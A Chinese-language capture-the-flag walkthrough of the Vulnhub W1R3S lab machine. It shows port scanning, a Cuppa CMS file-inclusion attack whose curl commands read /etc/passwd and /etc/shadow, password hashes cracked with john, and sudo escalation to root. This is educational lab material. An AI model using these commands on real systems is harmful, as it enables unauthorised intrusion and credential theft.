Vulnhub-w1r3s

# 渗透靶场低

## 收集资产

```shell
netdiscover -r 192.168.0.0/24
nmap -p- 192.168.0.133 #masscan -p 0-65535 192.168.0.133
nmap -sV -sC -p- -A 192.168.0.133
```

信息

```yaml
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
```

其中ftp和MySQL均可以通过未授权访问

## FTP收集

通过filezilla连接ftp可以获取到在`content/key.txt`中的flag2

```
flag2{ZJSGABW@890}
```

## 网站收集

### administrator目录

通过dirb扫描出Cuppa CMS未授权访问

![image-20240717084103970](https://download.imxbt.cn/upload/202407170841042023c79a503decf3404994fdcbd9d7d783d.png)

在administrator/media/files/中有file.csv内容是admin的信息

![image-20240717084837424](https://download.imxbt.cn/upload/202407170848374794b8dd7005b1ff399344c330478601f4d.png)

在exploit-db中搜索cuppa CMS刚好有一条记录与date_registered相符合的文件包含漏洞[Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion](https://www.exploit-db.com/exploits/25971)

![image-20240717091032786](https://download.imxbt.cn/upload/20240717091032857a89e7f105c05d8cd9031f4b409ea8850.png)

由于通过hackbar无法获取回显，所以使用curl查看passwd

![image-20240717091740946](https://download.imxbt.cn/upload/202407170917410563f6c2d09a8ad8548ed633edbf3763de8.png)

![image-20240717091810371](https://download.imxbt.cn/upload/20240717091810431071d05ac8369b8ba22525afb789e1a49.png)

```shell
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.0.133/administrator/alerts/alertConfigField.php | grep bash
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.0.133/administrator/alerts/alertConfigField.php
```

获得flag3

```
flag3{@789BWDJS}
```

通过查看/etc/shadow拿到root和w1r3s的hash密码然后用john进行hash爆破

| 用户名 | 哈希                                                         | 密码 |
| ------ | ------------------------------------------------------------ | ---- |
| root   | \$6\$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0 |      |
| w1r3s  | \$6\$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP. |      |

将拿到的shadow复制到本地然后用john进行爆破

```shell
#shadow文件
#w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::  
#root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
johnjohn shadow --wordlist=/usr/share/john/password.lst
```

爆破出`w1r3s`密码为`computer`

![image-20240717093307249](https://download.imxbt.cn/upload/2024071709330733496d5a96d6da8a8e576ebc07c8132b4f8.png)

### index_files目录

在`index_files目录有flag.txt`拿到flag1

```
flag1{ZJSGABW@321}
```

### WordPress目录

访问可以直接进入安装页面

![image-20240717085231855](https://download.imxbt.cn/upload/2024071708523193882a0c67017edaec162d81dec414bf2d7.png)

## Getshell

通过administrator目录拿到的w1r3s信息登录到ssh在home目录的key.txt拿到flag4

```
flag4{APKWT@AD}
```

查看id发现存在在sudo组中，所以直接sudo /bin/bash即可提权到root，并在root根目录找到flag5

```
flag5{@GOODLUCK}
```

![image-20240717094315543](https://download.imxbt.cn/upload/20240717094315623c4bd043368e35e3235865ab526225c5e.png)

Vulnhub-w1r3s

发表新评论